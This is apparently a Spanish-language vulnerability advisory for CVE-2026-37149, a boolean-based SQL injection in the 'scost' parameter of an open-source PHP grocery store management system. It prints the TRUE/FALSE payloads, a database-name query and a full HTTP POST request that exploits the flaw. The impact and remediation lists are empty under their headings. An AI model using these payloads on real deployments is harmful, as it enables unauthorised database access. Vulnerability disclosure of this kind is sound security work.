
CVE-2026-37149 - Vulnerabilidad de inyección SQL en el parámetro scost de search_products.php en GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.
Inyección SQL en GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
CVE ID: CVE-2026-37149 Tipo de vulnerabilidad: Inyección SQL (CWE-89) Gravedad: Alta Descubridor: Dhyey Patel
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contiene una vulnerabilidad de inyección SQL en el parámetro "scost" de "/grocery/search_products.php".
La aplicación no valida correctamente la entrada proporcionada por el usuario antes de incorporarla a las consultas SQL. Un atacante puede inyectar expresiones SQL manipuladas a través del parámetro vulnerable y manipular las consultas de la base de datos subyacente.
Una explotación exitosa puede permitir el acceso no autorizado a información sensible de la base de datos y la ejecución de sentencias SQL arbitrarias.
Producto: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN Versión: v1.0 Repositorio del proveedor:
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
Remoto
Proyecto de código abierto mantenido por el propietario del repositorio: https://github.com/anirudhkannanvp
La vulnerabilidad se confirmó mediante técnicas de inyección SQL basadas en booleanos.
Payload de condición TRUE
-1 OR 321=6 AND 000483=000483 --
Payload de condición FALSE
-1 OR 320=6 AND 000483=000483 --
Las respuestas de la aplicación diferían según si la condición inyectada se evaluaba como TRUE o FALSE, lo que confirma la inyección SQL.
Pruebas adicionales confirmaron la ejecución exitosa de funciones SQL, incluyendo:
SELECT database()
El nombre de la base de datos devuelto fue:
grocery
Esto demuestra que se pueden ejecutar consultas SQL arbitrarias a través del parámetro vulnerable.
Solicitud
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
Resultado
La respuesta cambia según la condición booleana inyectada, lo que confirma la inyección SQL en el parámetro "scost".
Los impactos potenciales incluyen:
Los desarrolladores deberían:
OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection
MITRE CVE Program https://www.cve.org
Descubierto y reportado por: Dhyey Patel